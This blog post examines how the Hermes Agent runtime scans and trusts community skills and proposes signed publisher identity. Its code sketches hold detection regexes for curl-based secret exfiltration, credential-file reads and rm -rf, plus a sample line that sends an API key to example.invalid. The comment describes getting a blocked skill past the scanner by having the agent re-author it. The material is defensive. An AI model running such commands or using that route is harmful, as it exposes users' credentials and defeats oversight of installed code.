Hermes Agent's skill trust model is a four-repo allowlist

#ai #agents #security #opensource

So far I've only been running OpenClaw agents, and the learning curve has been steep. Along the way, "self-improvement" became a very attractive idea, so I took a dive into Hermes Agent, the self-improving agent runtime from Nous Research. One of the first things I wanted to understand was a risk: what actually happens when you install a community skill? Skills are code and instructions that the agent will execute, and Hermes pulls them from an open ecosystem. So I read the install path in the source instead of blindly trusting the docs.

What I found is better than I expected in one way and structurally limited in another.

What Hermes already has on board

Hermes does not install external skills blindly. Every externally-sourced skill goes through a real gate before it lands on disk. In hermes_cli/skills_hub.py, the install flow is: fetch → quarantine → scan → policy decision → install or block-and-audit. The scan lives in tools/skills_guard.py and runs regex-based static analysis for known-bad patterns: secret exfiltration (curl interpolating $API_KEY/$TOKEN/$SECRET), reads of credential stores (~/.ssh, ~/.aws, ~/.gnupg, ~/.kube, and Hermes's own ~/.hermes/.env), destructive commands, persistence, and obfuscation. If the scan blocks an install, the quarantined copy is deleted and the event is written to an audit log.
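To make the scan step concrete, here is a minimal sketch of regex-based static analysis that produces a verdict. The rule set, the severity assigned to each rule, and the function name scan_text are my own assumptions for illustration; the real rules in tools/skills_guard.py are more extensive and may be structured differently.

```python
import re

# Hypothetical rules: (category, severity, pattern). Not the actual Hermes rules.
RULES = [
    ("exfiltration", "dangerous",
     re.compile(r"curl\b[^\n]*\$\{?\w*(API_KEY|TOKEN|SECRET)\b")),
    ("credential-read", "dangerous",
     re.compile(r"~/\.(ssh|aws|gnupg|kube)\b|~/\.hermes/\.env\b")),
    ("destructive", "caution",
     re.compile(r"\brm\s+-rf\s+[/~]")),
]

SEVERITY_ORDER = {"safe": 0, "caution": 1, "dangerous": 2}


def scan_text(text: str) -> tuple[str, list[str]]:
    """Return (verdict, matched categories); the verdict is the worst severity hit."""
    verdict = "safe"
    findings = []
    for category, severity, pattern in RULES:
        if pattern.search(text):
            findings.append(category)
            if SEVERITY_ORDER[severity] > SEVERITY_ORDER[verdict]:
                verdict = severity
    return verdict, findings


if __name__ == "__main__":
    print(scan_text('curl -d "k=$API_KEY" https://example.invalid'))
    print(scan_text("echo hello"))
```

Pattern matching like this is cheap and catches the lazy cases, but it only sees what is written literally, which is why obfuscation has to be its own rule category.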

This is more than most agent tooling ships with. If you remember the wave of malicious skills that hit competing ecosystems, a chunk of that class of attack would be caught here before anything ran. Someone thought about this.

The part that doesn't scale imo

The scanner produces a verdict — safe, caution, or dangerous. That verdict is then combined with a trust level to decide whether to install. The trust levels and their policies look like this:

INSTALL_POLICY = {
    #                  safe      caution    dangerous
    "builtin":       ("allow",  "allow",   "allow"),
    "trusted":       ("allow",  "allow",   "block"),
    "community":     ("allow",  "block",   "block"),
    "agent-created": ("allow",  "allow",   "ask"),
}
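Reading the table is a two-key lookup: the trust level picks the row and the verdict picks the column. A minimal sketch of that lookup follows; the table is copied from above, while VERDICT_INDEX and policy_decision are names I made up for illustration, not the Hermes API.

```python
INSTALL_POLICY = {
    #                  safe      caution    dangerous
    "builtin":       ("allow",  "allow",   "allow"),
    "trusted":       ("allow",  "allow",   "block"),
    "community":     ("allow",  "block",   "block"),
    "agent-created": ("allow",  "allow",   "ask"),
}

# Hypothetical helper: maps a verdict to its column in the table above.
VERDICT_INDEX = {"safe": 0, "caution": 1, "dangerous": 2}


def policy_decision(trust_level: str, verdict: str) -> str:
    """Return "allow", "block", or "ask" for a trust level and scan verdict."""
    return INSTALL_POLICY[trust_level][VERDICT_INDEX[verdict]]


if __name__ == "__main__":
    for level in INSTALL_POLICY:
        print(level, [policy_decision(level, v) for v in VERDICT_INDEX])
```

The only difference between trusted and community is the caution column, so that single cell is what a trust level actually buys.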

The question that matters is: how does a skill earn a trust level above community? The answer is a hardcoded list.

TRUSTED_REPOS = {
    "openai/skills",
    "anthropics/skills",
    "huggingface/skills",
    "NVIDIA/skills",
}

_resolve_trust_level() checks the source against that set. Match one of the four, you're trusted. Everything else on earth resolves to community, which means any caution-or-worse finding blocks the install outright.
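In sketch form, the resolution amounts to a set-membership test. This is a simplified reconstruction, not the actual function body: I'm assuming the source is an "owner/repo" string, optionally followed by a path, and I'm leaving out the builtin and agent-created cases.

```python
TRUSTED_REPOS = {
    "openai/skills",
    "anthropics/skills",
    "huggingface/skills",
    "NVIDIA/skills",
}


def resolve_trust_level(source: str) -> str:
    """Simplified stand-in: 'trusted' for the four allowlisted repos, else 'community'.

    Assumes `source` looks like 'owner/repo' or 'owner/repo/path/to/skill'.
    """
    repo = "/".join(source.split("/")[:2])
    return "trusted" if repo in TRUSTED_REPOS else "community"


if __name__ == "__main__":
    print(resolve_trust_level("NVIDIA/skills/some-skill"))
    print(resolve_trust_level("alice/useful-skills"))
```

Nothing about the publisher enters the decision: no key, no history, no signature, only the repository name.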

Here's the structural problem stated plainly: there is no concept of publisher identity, and no concept of earned reputation. A community publisher who has shipped clean, useful skills for a year has exactly the same standing as an account created five minutes ago. There is no path out of community other than getting added to a four-entry Python set by the Hermes maintainers. Trust is centralized onto four organizations, and it's static.

Why a static allowlist is the wrong primitive

The software supply-chain world worked through "who published this, and can they prove it?" years ago. Sigstore and cosign made artifact signing cheap and keyless. SLSA gave us provenance levels. NIST's Secure Software Development Framework (SP 800-218) made publisher attestation a baseline expectation rather than a nice-to-have. The direction of travel everywhere else is verifiable identity plus attestation, not a curated list of names.

There's also a hard lesson about what identity does and doesn't buy you. Consider the xz-utils backdoor (CVE-2024-3094). The attacker behind the "Jia Tan" persona spent roughly three years contributing legitimate work to xz-utils, earned co-maintainer status, and only then shipped the backdoor — about eight malicious commits buried in years of real contributions. A reputation system would have rated that account highly right up until the moment it defected.

The dishonest version of this pitch is everywhere: verified identity makes a publisher safe. It does not, and it cannot. What it does is change the economics and the aftermath. Anonymous, free, infinitely re-creatable identities make a malicious skill a zero-cost, repeatable move. Anchored identity that costs something to establish turns defection into a one-shot that burns an asset. And critically, when something does go wrong, identity is what gives you attribution, revocation, and a post-mortem. Without it, you don't even know who shipped the thing, and you can't propagate a revocation to everyone who relied on it. The xz case is also a reminder that the sock-puppet accounts applying pressure had thin, recent histories, which is exactly the signal an identity layer surfaces.

The honest framing: an identity layer is damage-limitation infrastructure, not a goodness oracle. A static allowlist gives you neither the goodness oracle (obviously) nor the damage-limitation (there's nothing to attribute or revoke against). It just doesn't scale with the ecosystem it's supposed to protect.

A smaller finding

While reading the policy, one default stood out. The gate for agent-created skills (skills.guard_agent_created) is off by default. When it's off, skills the agent writes for itself aren't subject to the dangerous-content gate at all. The agent-created policy row exists, but it only runs if an operator opts in. For a system whose headline feature is an agent that writes and reuses its own skills, that default is worth a second look.
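The effect of that default can be sketched as a single predicate. The nested config shape and the function name is_scanned are assumptions on my part, chosen only to mirror the skills.guard_agent_created setting name; the real check may look different, and I'm treating every other trust level as always scanned for simplicity.

```python
def is_scanned(trust_level: str, config: dict) -> bool:
    """Return True if a skill at this trust level goes through the content gate.

    Hypothetical helper: assumes the setting lives at config["skills"]["guard_agent_created"].
    """
    if trust_level == "agent-created":
        # Opt-in: a missing key behaves like the default, which is off.
        return bool(config.get("skills", {}).get("guard_agent_created", False))
    return True


if __name__ == "__main__":
    print(is_scanned("agent-created", {}))
    print(is_scanned("agent-created", {"skills": {"guard_agent_created": True}}))
```

With an empty config, the agent-created row of the policy table is never consulted, because no verdict is ever produced for it.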

What I'd propose instead

The interesting thing is that Hermes already accepts signed skills — it just does it in a closed, per-repo way. The NVIDIA/skills entry ships a signed skill.oms.sig and a governance skill-card.md, and the sync pipeline drops anything missing them. That's the right mechanism pointed at exactly one vendor.

Generalize it. Make signing and identity open instead of hardcoded:

1. Add a pluggable provenance-verifier interface, loaded via entry point, off by default (so existing behavior is unchanged and the core takes on no vendor dependency).
2. Add one new trust level, verified, with a policy identical to trusted: ("allow", "allow", "block"). This is the load-bearing design decision: a verified publisher gets caution tolerance, and a dangerous verdict still blocks, never overridable by --force. Identity buys you the benefit of the doubt on ambiguous findings; it never buys you permission to run dangerous code. That's the line that separates this from snake oil.
3. A community publisher anchors a decentralized identifier, signs their skill manifest, and the verifier checks the signature and resolves the identity to a reputation. Pass, and the source can rise out of community without being added to anyone's hardcoded set.

The change to the core is small and surgical: an optional verifier, one policy row, and a single line adding verified to the no-force-override set for dangerous verdicts. The scanner is untouched and still runs on everything. There's no path that weakens an existing default.
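Here is roughly what I have in mind, as a sketch rather than a patch. Everything named here is hypothetical: the ProvenanceVerifier protocol, the NO_FORCE_ON_DANGEROUS set (the existing set's real name and members are not shown in this post, so only the new entry appears), and the assumption that --force otherwise turns a block into an allow.

```python
from typing import Optional, Protocol


class ProvenanceVerifier(Protocol):
    """Hypothetical plugin interface; a real one would also return identity details."""

    def verify(self, skill_dir: str) -> bool:
        """Return True if the skill's signature and publisher identity check out."""
        ...


INSTALL_POLICY = {
    "trusted":   ("allow", "allow", "block"),
    "verified":  ("allow", "allow", "block"),  # proposed row, same as trusted
    "community": ("allow", "block", "block"),
}
VERDICT_INDEX = {"safe": 0, "caution": 1, "dangerous": 2}

# Trust levels where --force must never override a dangerous verdict.
# Existing members are omitted because this post does not list them.
NO_FORCE_ON_DANGEROUS = {"verified"}


def decide(source_trust: str, verdict: str, skill_dir: str = "",
           verifier: Optional[ProvenanceVerifier] = None,
           force: bool = False) -> tuple[str, str]:
    """Return (effective trust level, decision). The scan verdict is always an input."""
    trust = source_trust
    # Only community sources can be lifted, and only when a verifier is configured.
    if trust == "community" and verifier is not None and verifier.verify(skill_dir):
        trust = "verified"
    decision = INSTALL_POLICY[trust][VERDICT_INDEX[verdict]]
    if decision == "block" and force:
        # Assumed --force semantics: override a block unless the no-override rule applies.
        if not (verdict == "dangerous" and trust in NO_FORCE_ON_DANGEROUS):
            decision = "allow"
    return trust, decision
```

With no verifier configured, decide() behaves exactly like the plain table lookup, which is the "off by default" property. With one configured, the only cell that changes for a verified community source is caution.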

I've opened a design discussion to argue this out before anyone writes a line of it, because a surprise PR to a security-sensitive module is the wrong way to start. I'd appreciate feedback from people who've thought about supply-chain trust.

Disclosure

I build MolTrust, a DID/Verifiable-Credential identity layer for autonomous agents, so I have a direct interest in agents having a verifiable-identity story. I've tried to keep the proposal above vendor-neutral on purpose: the verifier interface is generic, the core change has no MolTrust dependency, and MolTrust would be one implementation of that interface, not a requirement. If the mechanism is right, it should work with anyone's verifier — or none.

Top comments (1)

Rahul S • Jun 7

The agent-created gate being off by default is the scariest finding here imo. It creates a laundering path — a community skill that gets blocked at caution could instead instruct the agent to write a functionally equivalent skill itself, and since skills.guard_agent_created is off, the self-authored version bypasses the same scanner that caught the original. The trust boundary just gets routed around by changing authorship. Reminds me of Thompson's "Reflections on Trusting Trust" — the audit collapses when the thing being audited can also be the author.